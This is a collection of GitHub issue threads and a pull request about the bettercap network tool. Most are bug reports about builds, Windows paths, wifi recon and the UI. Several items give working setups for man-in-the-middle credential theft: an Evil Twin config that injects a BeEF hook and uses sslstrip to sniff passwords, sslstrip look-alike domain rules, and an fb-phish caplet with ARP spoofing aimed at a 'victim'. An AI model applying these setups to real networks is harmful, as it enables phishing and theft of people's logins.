Hi, this is not a bug report, just looking for some support.

Our team has old versions of bettercap fully integrated into another script called airgeddon performing flawlessly Evil Twin attacks using Bettercap+BeEF, etc... For now, max bettercap version supported is 1.6.2 (just before the major change) and we would like to integrate new Bettercap versions (2.x). We already have the function to detect if the bettercap present in OS is the old or the new one, that part is ok. I must say we missed some "-version" or similar tag in order to get this easier... but anyway it was done using bettercap -eval "q" and parsing output... We just like to add this awesome tool to keep the compatibility with its new versions. We are trying to keep same functionallity and features using the new versions 2.x

Ok, after the introduction, lets explain what we really need:

Environment

We are using on tests bettercap 2.13 in Kali which is the latest in their repos and 2.13.1 in Parrot Security.

An example of the command line on the old fully working 1.6.2 version is:

bettercap -I wlan0 -X -S NONE --no-discovery --proxy --proxy-port 8080 --disable-parsers URL,HTTPS,DHCP --no-http-logs --proxy-module injectjs --js-url "http://192.168.1.1:3000/hook.js" --dns-port 5300

This is our bettercap 2.x configuration file approach:

net.recon off

set http.proxy.port 8080
set http.proxy.script ag.bettercap.js
set http.proxy.sslstrip true
http.proxy on

set net.sniff.verbose true
net.sniff on

events.ignore net.sniff.http.response
events.ignore http.proxy.spoofed-response
events.ignore net.sniff.dns
events.ignore net.sniff.tcp
events.ignore net.sniff.udp

And we also have the ag.bettercap.js file with the BeEF stuff pointing to the server's hook.js file. I'm not going to put its content because the BeEF part is working. The js is injected and the clients are hooked, that part is ok. The problem is that nor sslstrip neither ssltrip2 are not working for us. For sure we are doing something wrong.

Bear in mind that on the Evil Twin integration there is no need for ARP spoofing or any recon... the MiTM is already done. The features we need are:

• sniff passwords from GET/POST http requests <- this is working
• sniff ftp passwords <- I think you recently did a commit to add this feature, thanks!
• inject BeEF js <- this is also working
• sslstrip <- we are not seeing any password from any ssl site (even unknown custom sites without HSTS)
• sslstrip2 <- this is not working for us 😢
• Try to clean as much as possible the output <- that's the reason of using events.ignore stuff
• Log to a file while showing output in the console at the same time <- not sure if this is possible using set events.stream.output statement... anyway I think maybe can be done using tee

Are we on the right path? Could you help us to provide a config file approach for this kind of configuration? That would be awesome!

P.S. Feel free to close this instantly because as I said, it is not a bug report, just some kind of question. Maybe we can talk here about this even with the closed thread.

Thank you so much for your time and regards.

Hello been speaking to you on twitter about the 404 page not found.

bettercap --version = bettercap v2.21.1 (built for linux amd64 with go1.11.5)

go version = go version go1.11.6 linux/amd64

Distributor ID: Kali Description: Kali GNU/Linux Rolling Release: 2019.1

BETTERCAP START

root@Jaja:~# bettercap -caplet http-ui
bettercap v2.21.1 (built for linux amd64 with go1.11.5) [type 'help' for a list of commands]

[15:33:37] [sys.log] [inf] api.rest api server starting on http://127.0.0.1:8081
192.168.0.0/24 > 192.168.0.13  » [15:33:37] [sys.log] [inf] http.server starting on http://127.0.0.1:80
192.168.0.0/24 > 192.168.0.13  »  

BETTERCAP DEBUG

root@Jaja:~# bettercap -debug
bettercap v2.21.1 (built for linux amd64 with go1.11.5) [type 'help' for a list of commands]

192.168.0.0/24 > 192.168.0.13  » [15:42:03] [sys.log] [dbg] FindGateway(wlan0) [cmd=ip opts=[route] parser=^(default|[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+)\svia\s([0-9]+\.[0-9]+\.[0-9]+\.[0-9]+)\sdev\s(\S+).*$]
192.168.0.0/24 > 192.168.0.13  » [15:42:03] [sys.log] [dbg] FindGateway(wlan0) output:
default via 192.168.0.1 dev wlan0 proto dhcp metric 600 
192.168.0.0/24 dev wlan0 proto kernel scope link src 192.168.0.13 metric 600
192.168.0.0/24 > 192.168.0.13  » [15:42:03] [sys.log] [dbg] FindGateway(wlan0) line 'default via 192.168.0.1 dev wlan0 proto dhcp metric 600' matched with [default via 192.168.0.1 dev wlan0 proto dhcp metric 600 default 192.168.0.1 wlan0]
192.168.0.0/24 > 192.168.0.13  » [15:42:03] [sys.log] [dbg] gateway is 192.168.0.1[c0:05:c2:3f:9c:68]
192.168.0.0/24 > 192.168.0.13  » [15:42:03] [session.started] {session.started 2019-03-28 15:42:03.284805346 +0000 GMT m=+0.099502755 <nil>}
192.168.0.0/24 > 192.168.0.13  » [15:42:03] [mod.started] events.stream
192.168.0.0/24 > 192.168.0.13  »  

NETSTAT

root@Jaja:~# netstat -an | grep LISTEN
tcp        0      0 127.0.0.1:80            0.0.0.0:*               LISTEN     
tcp        0      0 127.0.0.1:8081          0.0.0.0:*               LISTEN     
unix  2      [ ACC ]     STREAM     LISTENING     25739    @/tmp/.ICE-unix/1017
unix  2      [ ACC ]     STREAM     LISTENING     16996    @/tmp/dbus-csCBq8sG
unix  2      [ ACC ]     STREAM     LISTENING     25631    /run/user/0/systemd/private
unix  2      [ ACC ]     STREAM     LISTENING     20366    @/tmp/.X11-unix/X0
unix  2      [ ACC ]     STREAM     LISTENING     25693    @/tmp/.X11-unix/X1
unix  2      [ ACC ]     STREAM     LISTENING     16992    @/tmp/dbus-VqpBnvoJ
unix  2      [ ACC ]     STREAM     LISTENING     25637    /run/user/0/gnupg/S.dirmngr
unix  2      [ ACC ]     STREAM     LISTENING     16993    @/tmp/dbus-yhXslgn8
unix  2      [ ACC ]     STREAM     LISTENING     25640    /run/user/0/bus
unix  2      [ ACC ]     STREAM     LISTENING     25642    /run/user/0/gnupg/S.gpg-agent.extra
unix  2      [ ACC ]     STREAM     LISTENING     25674    @/tmp/dbus-RMewA1nA
unix  2      [ ACC ]     STREAM     LISTENING     25644    /run/user/0/pulse/native
unix  2      [ ACC ]     STREAM     LISTENING     25647    /run/user/0/gnupg/S.gpg-agent.browser
unix  2      [ ACC ]     STREAM     LISTENING     25649    /run/user/0/gnupg/S.gpg-agent
unix  2      [ ACC ]     STREAM     LISTENING     306      /run/systemd/private
unix  2      [ ACC ]     STREAM     LISTENING     25651    /run/user/0/gnupg/S.gpg-agent.ssh
unix  2      [ ACC ]     STREAM     LISTENING     27280    @/dbus-vfs-daemon/socket-dIa4supC
unix  2      [ ACC ]     STREAM     LISTENING     318      /run/systemd/journal/stdout
unix  2      [ ACC ]     STREAM     LISTENING     20422    @/tmp/.ICE-unix/660
unix  2      [ ACC ]     STREAM     LISTENING     334      /run/systemd/fsck.progress
unix  2      [ ACC ]     STREAM     LISTENING     341      /run/lvm/lvmpolld.socket
unix  2      [ ACC ]     STREAM     LISTENING     16995    @/tmp/dbus-rUPG3fmw
unix  2      [ ACC ]     SEQPACKET  LISTENING     361      /run/udev/control
unix  2      [ ACC ]     STREAM     LISTENING     23306    @/tmp/dbus-B1EKyIZ8r4
unix  2      [ ACC ]     STREAM     LISTENING     16249    /var/run/dbus/system_bus_socket
unix  2      [ ACC ]     STREAM     LISTENING     16253    /run/uuidd/request
unix  2      [ ACC ]     STREAM     LISTENING     16257    /var/run/pcscd/pcscd.comm
unix  2      [ ACC ]     STREAM     LISTENING     20367    /tmp/.X11-unix/X0
unix  2      [ ACC ]     STREAM     LISTENING     20423    /tmp/.ICE-unix/660
unix  2      [ ACC ]     STREAM     LISTENING     20404    @/tmp/dbus-VrFnHVD0D3
unix  2      [ ACC ]     STREAM     LISTENING     77452    /run/user/0/speech-dispatcher/speechd.sock
unix  2      [ ACC ]     STREAM     LISTENING     19092    /var/run/irqbalance554.sock
unix  2      [ ACC ]     STREAM     LISTENING     25258    /run/user/0/keyring/control
unix  2      [ ACC ]     STREAM     LISTENING     25776    /run/user/0/keyring/ssh
unix  2      [ ACC ]     STREAM     LISTENING     25778    /run/user/0/keyring/pkcs11
unix  2      [ ACC ]     STREAM     LISTENING     21696    /run/user/135/systemd/private
unix  2      [ ACC ]     STREAM     LISTENING     22467    /run/NetworkManager/private-dhcp
unix  2      [ ACC ]     STREAM     LISTENING     21702    /run/user/135/gnupg/S.gpg-agent.ssh
unix  2      [ ACC ]     STREAM     LISTENING     21705    /run/user/135/pulse/native
unix  2      [ ACC ]     STREAM     LISTENING     21708    /run/user/135/bus
unix  2      [ ACC ]     STREAM     LISTENING     21710    /run/user/135/gnupg/S.gpg-agent.extra
unix  2      [ ACC ]     STREAM     LISTENING     21712    /run/user/135/gnupg/S.gpg-agent
unix  2      [ ACC ]     STREAM     LISTENING     25694    /tmp/.X11-unix/X1
unix  2      [ ACC ]     STREAM     LISTENING     21714    /run/user/135/gnupg/S.dirmngr
unix  2      [ ACC ]     STREAM     LISTENING     21716    /run/user/135/gnupg/S.gpg-agent.browser
unix  2      [ ACC ]     STREAM     LISTENING     25724    /tmp/ssh-mjyXq9F3vYXl/agent.1017
unix  2      [ ACC ]     STREAM     LISTENING     25740    /tmp/.ICE-unix/1017
unix  2      [ ACC ]     STREAM     LISTENING     25675    @/tmp/dbus-BrKuH829

Sorry for taking up your time and massive thank you for being so helpful

Jamie P

This pull request is related to #723. I added the ability to choose how domains are spoofed. Thus, I removed the useIDN option which was used to choose between two TLD modifications.

How to choose how domains are spoofed? The new option is http.proxy.sslstrip.replacements. It requires a space-separated list of <original_domain>:<stripped_domain>, ordered by priority. Internationalized Domain Names are supported.
For example : *.google.com:*.gooogle.com *.com:*.corn will replace *.google.com with *.gooogle.com (www.google.com -> www.gooogle.com), *.com with *.corn (facebook.com -> facebook.corn) but not *.google.com with *.google.corn (first rule takes precedence).
Default values are : *.com:*.corn *.org:*.orq *.net:*.nel
You can use multiple wildcards for more specific pattern matching. For example, *.google.*:*.gooogle.* is a valid parameter.

Three additional fixes:

• sslstrip couldn't handle 2 redirections (http://example.com -> https://example.com -> https://www.example.com) because it checked for a redirection from the HTTP scheme
• sslstrip used a long time-to-live (1024 seconds), which caused stripped hosts to be cached by target browsers even after the attack ended. Now it's reduced to 5 seconds (note that some browsers might ignore it)
• sslstrip couldn't edit subdomains to fix cookies

https://github.com/bettercap/bettercap/commit/1f8e97d91fbb67570c5d44e1c5c0442e497d7d09 was intended to fix issue https://github.com/bettercap/bettercap/issues/209

What if we set res.Body = ""?

Wouldn't the WasModified() function in modules/http_proxy_js_response.go return false even if we want to serve an empty response body?

https://github.com/bettercap/bettercap/blob/cfe5f9f76b764efb6f698c02966ae954b0bcdac9/modules/http_proxy_js_response.go#L70

Problem Description

Testing a USB Alfa AC1200 (AWUS036ACH) with bettercap. When executing wifi.recon on I receive the following error:

 wlxXXXXXXXXXXXX  » wifi.recon on
[21:35:43] [sys.log] [inf] wifi using interface wlxXXXXXXXXXXXX (00:XX:XX:XX:XX:XX)
[21:35:43] [sys.log] [war] wifi could not set interface wlxXXXXXXXXXXXX txpower to 30, 'Set Tx Power' requests not supported
[21:35:43] [sys.log] [err] error while activating handle: unknown activated error: -1
 wlxXXXXXXXXXXXX  »  

Environment

bettercap v2.24.1 (built for linux amd64 with go1.10.4)

# iwconfig wlxXXXXXXXXXXXX
wlxXXXXXXXXXXXX  unassociated  Nickname:"<WIFI@REALTEK>"
          Mode:Monitor  Frequency=2.452 GHz  Access Point: Not-Associated   
          Sensitivity:0/0  
          Retry:off   RTS thr:off   Fragment thr:off
          Encryption key:off
          Power Management:off
          Link Quality=0/100  Signal level=0 dBm  Noise level=0 dBm
          Rx invalid nwid:0  Rx invalid crypt:0  Rx invalid frag:0
          Tx excessive retries:0  Invalid misc:0   Missed beacon:0

Distributor ID:	Debian
Description:	Debian GNU/Linux 10 (buster)
Release:	10
Codename:	buster

Linux sapientia 4.19.0-5-amd64 #1 SMP Debian 4.19.37-5+deb10u2 (2019-08-08) x86_64 GNU/Linux

Wireless card drivers built and installed using dkms method from https://github.com/aircrack-ng/rtl8812au

bettercap -debug -iface wlxXXXXXXXXXXXX
bettercap v2.24.1 (built for linux amd64 with go1.10.4) [type 'help' for a list of commands]

 wlxXXXXXXXXXXXX  » [21:42:51] [sys.log] [dbg] FindGateway(wlxXXXXXXXXXXXX) [cmd=ip opts=[route] parser=^(default|[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+)\svia\s([0-9]+\.[0-9]+\.[0-9]+\.[0-9]+)\sdev\s(\S+).*$]
 wlxXXXXXXXXXXXX  » [21:42:51] [sys.log] [dbg] FindGateway(wlxXXXXXXXXXXXX) output:
default via 192.68.0.1 dev wlp3s0 
default dev enp0s25 scope link metric 1002 linkdown 
169.254.0.0/16 dev enp0s25 proto kernel scope link src 169.254.9.111 linkdown 
192.168.0.0/24 dev wlp3s0 proto kernel scope link src 192.168.0.10 
192.168.72.0/24 dev vmnet8 proto kernel scope link src 192.168.72.1 
192.168.228.0/24 dev vmnet1 proto kernel scope link src 192.168.228.1
 wlxXXXXXXXXXXXX  » [21:42:51] [sys.log] [dbg] FindGateway(wlxXXXXXXXXXXXX): nothing found :/
 wlxXXXXXXXXXXXX  » [21:42:51] [sys.log] [dbg] Could not detect gateway.
 wlxXXXXXXXXXXXX  » [21:42:53] [session.started] {session.started 2019-08-24 21:42:53.817373034 +0100 IST m=+2.014107730 <nil>}
 wlxXXXXXXXXXXXX  » [21:42:53] [mod.started] events.stream
 wlxXXXXXXXXXXXX  » wifi.recon on
[21:43:02] [sys.log] [inf] wifi using interface wlxXXXXXXXXXXXX (xx:xx:xx:xx:xx:xx)
[21:43:02] [sys.log] [war] wifi could not set interface wlxXXXXXXXXXXXX txpower to 30, 'Set Tx Power' requests not supported
[21:43:02] [sys.log] [err] error while activating handle: unknown activated error: -1
 wlxXXXXXXXXXXXX  »  

Steps to Reproduce

1. bettercap -debug -iface wlxXXXXXXXXXXXX
2. wifi.recon on

Prerequisites

• [ X] I read the README.
• [ X] I am running the latest stable version.
• [X] I already searched other issues to see if this problem was already reported.
• [X] I understand I don't necessarily have to paste this Prerequisites section in the issue.

Description

Unable to build bettercap

Environment

Please provide:

• OS version and architecture you are using. Kali Linux x64
• Go version if building from sources. 1.10

Steps to Reproduce

1. install go lang and libpcap-dev: apt-get install golang apt-get install libpcap-dev

2. Add GOPATH to PATH: export GOPATH=$(go env GOPATH) export PATH=$PATH:$GOPATH/bin

3. Grab bettercap go get github.com/bettercap/bettercap

Expected behavior: What you expected to happen Get da bettercap

Actual behavior: What actually happened Error: go build github.com/bettercap/gopacket/pcap: invalid flag in #cgo LDFLAGS: /usr/lib/x86_64-linux-gnu/libpcap.a

♥ ANY INCOMPLETE REPORT WILL BE CLOSED RIGHT AWAY ♥

I'm not a networking genius, so I'm kind of coming at this with just the information on https://www.bettercap.org/ and https://github.com/bettercap/bettercap/. And I'm not sure if any of my later errors are due to earlier setup, so I'm just gonna walk through the whole thing.

Environment

Please provide:

• Bettercap version: bettercap v2.24.1 (built for windows amd64 with go1.12.4)
• OS version and architecture you are using: Windows 10 Pro 64-bit 1903
• Go version if building from sources.
• Command line arguments you are using.
• Caplet code you are using or the interactive session commands.
• Full debug output while reproducing the issue ( bettercap -debug ... ).

Steps to Reproduce

Download the Windows file from the releases page.

Does it need to be unblocked? Is that a relevant security issue? The ZIP file shows as blocked when downloaded. But, I'm not sure it behaves any differently when unblocked. I'll proceed by unblocking then extracting.

At this point, bettercap.exe does nothing when invoked (maybe an error message here would help).

PS> .\bettercap.exe

There are more install pre-reqs.

For every new release, we distribute bettercap’s precompiled binaries. In order to be able to use them, you’ll need the following dependencies on your system:

libpcap libusb-1.0-0 (required by the HID module)

I don't understand what "need... on your system" means for Windows. In the same folder as bettercap.exe? Installed to some well-known system location?

I'm not sure where to get libpcap for Windows... WinPcap is obsolete, Npcap is current (but, will it work?), and libpcap is a source code archive (do I need to build one)?

I'll go with Npcap, for now, with these settings.

For libusb, I assume on Windows we're looking for something like libusb-1.0.dll. It looks like this is the official website and the downloads come from their GitHub releases page. This is another blocked archive. I'll unblock and extract.

There is no installer, it's just a DLL (actually, several DLLs for different... platforms?). I'll choose libusb-1.0.22.7z\MS64\dll\libusb-1.0.dll. I don't know where to "install" this, but this issue indicates...

Just make sure that's in the same directory as bettercap.exe

Now we're in business! I ran in an Administrator PowerShell session otherwise, I get a sketchy UAC pop-up from Npcap.

PS> .\bettercap.exe                                                                                                        

WARNING: This terminal does not support colors, view will be very limited.

bettercap v2.24.1 (built for windows amd64 with go1.12.4) [type 'help' for a list of commands]

10.0.75.0/24 > 10.0.75.1  »

I am unable to update caplets.

10.0.75.0/24 > 10.0.75.1  » caplets.update
[11:16:12] [sys.log] [inf] caplets creating caplets install path /usr/local/share/bettercap/ ...
[11:16:12] [sys.log] [err] open /tmp/caplets.zip: The system cannot find the path specified.

At this point, I'm looking for bettercap's data folders, because I see it's still referencing Linux paths (/usr/local/share/bettercap). I found files in C:\! This is an extremely non-standard path for Windows applications.

Some paths that might make sense on Windows include (I'm not finding great references on the use and expectations of these locations):

• %USERPROFILE%\.bettercap
• %PROGRAMDATA%\bettercap
• %LOCALAPPDATA%\bettercap

Using my new knowledge, if I manually create C:\tmp, then I can update caplets.

PS> mkdir C:\tmp
PS> bettercap.exe
...
10.0.75.0/24 > 10.0.75.1  » caplets.update
[11:16:59] [sys.log] [inf] caplets downloading caplets from https://github.com/bettercap/caplets/archive/master.zip ...
[11:16:59] [sys.log] [inf] caplets installing caplets to \usr\local\share\bettercap\caplets ...

Now, I can update the UI and run the HTTP server.

10.0.75.0/24 > 10.0.75.1  » ui.update
[11:24:22] [sys.log] [inf] ui checking latest stable release ...
[11:24:23] [sys.log] [inf] ui downloading ui v1.3.0 from https://github.com/bettercap/ui/releases/download/v1.3.0/ui.zip ...
[11:24:24] [sys.log] [inf] ui installing to \usr\local\share\bettercap\ui ...
[11:24:32] [sys.log] [inf] ui installation complete, you can now run the http-ui (or https-ui) caplet to start the UI.
10.0.75.0/24 > 10.0.75.1  » http-ui
[11:25:06] [sys.log] [inf] api.rest api server starting on http://127.0.0.1:8081

Success!

Although, the log dumps a lot of wtf messages on start and while poking around the UI.

wtf: caplet C:\usr\local\share\bettercap\caplets\ap.cap not found
wtf: caplet C:\usr\local\share\bettercap\caplets\gps.cap not found
wtf: caplet C:\usr\local\share\bettercap\caplets\http-ui.cap not found
wtf: caplet C:\usr\local\share\bettercap\caplets\https-ui.cap not found
wtf: caplet C:\usr\local\share\bettercap\caplets\local-sniffer.cap not found
wtf: caplet C:\usr\local\share\bettercap\caplets\mana.cap not found
wtf: caplet C:\usr\local\share\bettercap\caplets\massdeauth.cap not found
wtf: caplet C:\usr\local\share\bettercap\caplets\mitm6.cap not found
wtf: caplet C:\usr\local\share\bettercap\caplets\netmon.cap not found
wtf: caplet C:\usr\local\share\bettercap\caplets\pita.cap not found
wtf: caplet C:\usr\local\share\bettercap\caplets\rogue-mysql-server.cap not found
wtf: caplet C:\usr\local\share\bettercap\caplets\simple-passwords-sniffer.cap not found
wtf: caplet C:\usr\local\share\bettercap\caplets\crypto-miner\crypto-miner.cap not found
wtf: caplet C:\usr\local\share\bettercap\caplets\download-autopwn\download-autopwn.cap not found
wtf: caplet C:\usr\local\share\bettercap\caplets\fb-phish\fb-phish.cap not found
wtf: caplet C:\usr\local\share\bettercap\caplets\gitspoof\gitspoof.cap not found
wtf: caplet C:\usr\local\share\bettercap\caplets\hstshijack\hstshijack.cap not found
wtf: caplet C:\usr\local\share\bettercap\caplets\http-req-dump\http-req-dump.cap not found
wtf: caplet C:\usr\local\share\bettercap\caplets\jsinject\jsinject.cap not found
wtf: caplet C:\usr\local\share\bettercap\caplets\login-manager-abuse\login-man-abuse.cap not found
wtf: caplet C:\usr\local\share\bettercap\caplets\proxy-script-test\proxy-script-test.cap not found
wtf: caplet C:\usr\local\share\bettercap\caplets\rtfm\rtfm.cap not found
wtf: caplet C:\usr\local\share\bettercap\caplets\tcp-req-dump\tcp-req-dump.cap not found
wtf: caplet C:\usr\local\share\bettercap\caplets\web-override\web-override.cap not found

Expected behavior: What you expected to happen

It would be good for bettercap to follow Windows standards, conventions, and user expectations. And it would be good if the docs were more complete for Windows users. A summary of the items that I found above...

• [ ] Note whether the bettercap Windows archive needs to be unblocked.
• [ ] Provide an error message if pre-requisites are not found.
• [ ] Provide instructions/links for installing libpcap on Windows via Npcap.
• [ ] Provide instructions/links for installing libusb on Windows via their website (also, note unblocking and "install" by copy/paste... or consider bundling the tested version of libusb with bettercap for Windows?)
• [ ] Explain the sketchy UAC pop-up coming from Npcap.
• [ ] Write files to the correct Windows location.
• [ ] Test for and create your required data directories if they do not exist (to avoid errors, say, when trying to download caplets.zip).
• [ ] Figure out why bettercap writes these wtf messages to the logs on Windows

Actual behavior: What actually happened

The Windows experience is a little rough.

Description

net.show is showing the gateway twice with the second time with a random IP address and hostname (eg. IP owned by Twitter or Google or AWS). It also shows two IPv4 Multicast devices that did not used to show up until yesterday.

Environment

• macOS High Sierra 10.13.3 Beta (17D25b)
• go version go1.9.4 darwin/amd64
• bettercap --debug

bettercap v2.0.0RC2 (type 'help' for a list of commands)

[19:33:35] [sys.log] [dbg] env.change: ticker.commands -> 'clear; net.show'
[19:33:35] [sys.log] [dbg] env.change: ticker.period -> '1'
❯ [19:33:35] [sys.log] [dbg] env.change: mac.changer.iface -> '<interface name>'
❯ [19:33:35] [sys.log] [dbg] env.change: mac.changer.address -> '<random mac>'
❯ [19:33:35] [sys.log] [dbg] env.change: net.probe.throttle -> '10'
❯ [19:33:35] [sys.log] [dbg] env.change: arp.spoof.targets -> '<entire subnet>'
❯ [19:33:35] [sys.log] [dbg] env.change: dhcp6.spoof.domains -> 'microsoft.com, goole.com, facebook.com, apple.com, twitter.com'
❯ [19:33:35] [sys.log] [dbg] env.change: dns.spoof.domains -> '*'
❯ [19:33:35] [sys.log] [dbg] env.change: dns.spoof.address -> '<interface address>'
❯ [19:33:35] [sys.log] [dbg] env.change: dns.spoof.all -> 'false'
❯ [19:33:35] [sys.log] [dbg] env.change: net.sniff.verbose -> 'true'
❯ [19:33:35] [sys.log] [dbg] env.change: net.sniff.local -> 'false'
❯ [19:33:35] [sys.log] [dbg] env.change: net.sniff.filter -> 'not arp'
❯ [19:33:35] [sys.log] [dbg] env.change: net.sniff.regexp -> ''
❯ [19:33:35] [sys.log] [dbg] env.change: net.sniff.output -> ''
❯ [19:33:35] [sys.log] [dbg] env.change: net.sniff.source -> ''
❯ [19:33:35] [sys.log] [dbg] env.change: http.server.path -> '.'
❯ [19:33:35] [sys.log] [dbg] env.change: http.server.address -> '<interface address>'
❯ [19:33:35] [sys.log] [dbg] env.change: http.server.port -> '80'
❯ [19:33:35] [sys.log] [dbg] env.change: http.server.certificate -> ''
❯ [19:33:35] [sys.log] [dbg] env.change: http.server.key -> ''
❯ [19:33:35] [sys.log] [dbg] env.change: http.port -> '80'
❯ [19:33:35] [sys.log] [dbg] env.change: http.proxy.address -> '<interface address>'
❯ [19:33:35] [sys.log] [dbg] env.change: http.proxy.port -> '8080'
❯ [19:33:35] [sys.log] [dbg] env.change: http.proxy.script -> ''
❯ [19:33:35] [sys.log] [dbg] env.change: https.port -> '443'
❯ [19:33:35] [sys.log] [dbg] env.change: https.proxy.address -> '<interface address>'
❯ [19:33:35] [sys.log] [dbg] env.change: https.proxy.port -> '8083'
❯ [19:33:35] [sys.log] [dbg] env.change: https.proxy.certificate -> '~/.bettercap-ca.cert.pem'
❯ [19:33:35] [sys.log] [dbg] env.change: https.proxy.key -> '~/.bettercap-ca.key.pem'
❯ [19:33:35] [sys.log] [dbg] env.change: https.proxy.script -> ''
❯ [19:33:35] [sys.log] [dbg] env.change: tcp.port -> '443'
❯ [19:33:35] [sys.log] [dbg] env.change: tcp.address -> ''
❯ [19:33:35] [sys.log] [dbg] env.change: tcp.proxy.address -> '<interface address>'
❯ [19:33:35] [sys.log] [dbg] env.change: tcp.proxy.port -> '8443'
❯ [19:33:35] [sys.log] [dbg] env.change: tcp.proxy.script -> ''
❯ [19:33:35] [sys.log] [dbg] env.change: api.rest.address -> '<interface address>'
❯ [19:33:35] [sys.log] [dbg] env.change: api.rest.port -> '8083'
❯ [19:33:35] [sys.log] [dbg] env.change: api.rest.username -> ''
❯ [19:33:35] [sys.log] [dbg] env.change: api.rest.password -> ''
❯ [19:33:35] [sys.log] [dbg] env.change: api.rest.certificate -> '~/.bcap-api.rest.certificate.pem'
❯ [19:33:35] [sys.log] [dbg] env.change: api.rest.key -> '~/.bcap-api.rest.key.pem'
❯ [19:33:35] [sys.log] [dbg] env.change: wifi.recon.channel -> ''
❯ [19:33:35] [sys.log] [dbg] env.change: wifi.hop.period -> '250'
❯ [19:33:35] [sys.log] [dbg] env.change: wifi.skip-broken -> 'true'
❯ [19:33:35] [sys.log] [dbg] env.change: iface.index -> '8'
❯ [19:33:35] [sys.log] [dbg] env.change: iface.name -> 'en0'
❯ [19:33:35] [sys.log] [dbg] env.change: iface.ipv4 -> '192.168.0.29'
❯ [19:33:35] [sys.log] [dbg] env.change: iface.ipv6 -> 'fd00:bc4d:fb98:1c32:f4bd:c0f2:b8b:b906'
❯ [19:33:35] [sys.log] [dbg] env.change: iface.mac -> 'dc:a9:04:xx:xx:xx'
❯ [19:33:35] [sys.log] [dbg] env.change: gateway.address -> '192.168.0.1'
❯ [19:33:35] [sys.log] [dbg] env.change: gateway.mac -> 'bc:4d:fb:98:1c:32'
❯ [19:33:35] [sys.log] [dbg] env.change: log.debug -> 'true'
❯ [19:33:35] [sys.log] [dbg] env.change: log.silent -> 'false'
❯ [19:33:35] [session.started] {session.started 2018-02-24 19:33:35.509364 -0800 PST m=+0.077244043 <nil>}
❯ [19:33:35] [mod.started] events.stream
❯ [19:33:35] [mod.started] net.recon
❯ [19:33:35] [endpoint.new] Endpoint 192.168.0.24 (appletv) detected as 40:cb:c0:xx:xx:xx.
❯ [19:33:35] [endpoint.new] Endpoint 224.0.0.251 detected as 01:00:5e:00:00:fb.
❯ [19:33:35] [endpoint.new] Endpoint 239.255.255.250 detected as 01:00:5e:7f:ff:fa.
❯ [19:33:38] [endpoint.new] Endpoint 199.59.148.241 detected as bc:4d:fb:98:1c:32 (Hitron Technologies.).
❯ net.show

+-----------------+-------------------+-----------------------------+-----------------------------+--------+--------+-----------+
|       IP        |        MAC        |            NAME             |           VENDOR            |  SENT  | RECVD  | LAST SEEN |
+-----------------+-------------------+-----------------------------+-----------------------------+--------+--------+-----------+
| 192.168.0.29    | dc:a9:04:xx:xx:xx | en0                         | Apple                       | 17 kB  | 17 kB  | 19:33:35  |
| 192.168.0.1     | bc:4d:fb:98:1c:32 | gateway                     | Hitron Technologies.        | 28 kB  | 1.3 kB | 19:33:35  |
|                 |                   |                             |                             |        |        |           |
| 192.168.0.24    | 40:cb:c0:xx:xx:xx | appletv                     |                             | 0 B    | 0 B    | 19:33:35  |
| 199.59.148.241  | bc:4d:fb:98:1c:32 | r-199-59-148-241.twttr.com. | Hitron Technologies.        | 1.1 kB | 660 B  | 19:33:52  |
| 224.0.0.251     | 01:00:5e:00:00:fb |                             |                             | 0 B    | 0 B    | 19:33:35  |
| 239.255.255.250 | 01:00:5e:7f:ff:fa |                             |                             | 0 B    | 25 kB  | 19:33:35  |
+-----------------+-------------------+-----------------------------+-----------------------------+--------+--------+-----------+

❯ [19:47:19] [endpoint.lost] Endpoint 199.59.148.241 (r-199-59-148-241.twttr.com.) lost.
❯ [19:47:20] [endpoint.new] Endpoint 54.190.15.71 detected as bc:4d:fb:98:1c:32 (Hitron Technologies.).
❯ [19:47:41] [endpoint.lost] Endpoint 54.190.15.71 (ec2-54-190-15-71.us-west-2.compute.amazonaws.com.) lost.
❯ [19:47:41] [endpoint.new] Endpoint 199.59.148.241 detected as bc:4d:fb:98:1c:32 (Hitron Technologies.).

Expected behavior:

• Should not see the Hitron Technologies gateway twice.
• Should not see a Twitter IP address and hostname for the gateway.
• Possibly shouldn't see the last two devices (vendor is IPv4 Multicast - not sure where they are from)

Actual behavior:

• Seeing the Hitron Technologies gateway twice.
• Duplicated gateway shows IP address owned by Twitter and a twttr.com hostname (note: this changes to any other random IP and hostname each time I run bettercap). Every few minutes it "loses" this device and then finds it again with another IP address.
• Seeing two IPv4 Multicast devices(?)

What I am trying at home is the fb-phishing caplet. When i run it no computer (http nor https) is being redirected to my http server. What I tried: Dns spoof The victim just loses connection and says there is no internet connection ARP spoof Nothing gets spoofed and the computer keeps it's connection HTTP(s) Proxy with SSLstrip Then you get the error from google chrome (HSTS)

Going from the victim ip to the webserver works and when i try to login it redirects to facebook.com/login.php but the inlog details are not saved nor displayed thus assuming that the javascript injection is not working.

Environment

Please provide:

• Bettercap version = latest

• Victum + host = MacOS

• Command line arguments you are using = sudo ./bettercap -caplet caplets/fb-phish.cap

Steps to Reproduce

1. download bettercap: https://github.com/bettercap/bettercap/releases/download/v2.4/bettercap_macos_amd64_2.4.zip
2. run: sudo ./bettercap -caplet caplets/fb-phish.cap
3. nothing happens on the victum PC.
4. I tried arp.spoof on but that does not help as well. (looks like ARP spoofing is not working on mac)

Expected behavior: Victim gets redirected to the fake FB site. fills in the username and password and that gets saved (does not save the login details!)

Actual behavior: The victim just goes straight through internetting without forwarding

LOG: Caplet:

set http.server.address 0.0.0.0
set http.server.path caplets/www/www.facebook.com/

set http.proxy.script caplets/fb-phish.js

http.proxy on
http.server on
arp.spoof on

Output:

bettercap v2.4 (type 'help' for a list of commands)

[14:39:55] [sys.log] [inf] Reading from caplet caplets/fb-phish.cap ...
[14:39:55] [endpoint.new] Endpoint 192.168.8.15 detected as ec:35:86:42:ac:92 (Apple).
[14:39:55] [sys.log] [inf] Enabling forwarding.
[14:39:55] [sys.log] [inf] http.proxy started on 192.168.8.16:8080 (sslstrip disabled)
[14:39:55] [sys.log] [inf] Enabling forwarding.
192.168.8.0/24 > 192.168.8.16  » [14:39:55] [sys.log] [inf] ARP spoofer started, probing 256 targets.
192.168.8.0/24 > 192.168.8.16  » [14:39:56] [sys.log] [inf] You are running 2.4 which is the latest stable version.
192.168.8.0/24 > 192.168.8.16  » active
arp.spoof (Keep spoofing selected hosts on the network.)

  arp.spoof.targets : <entire subnet>
  arp.spoof.whitelist : 

events.stream (Print events as a continuous stream.)

  events.stream.output : 

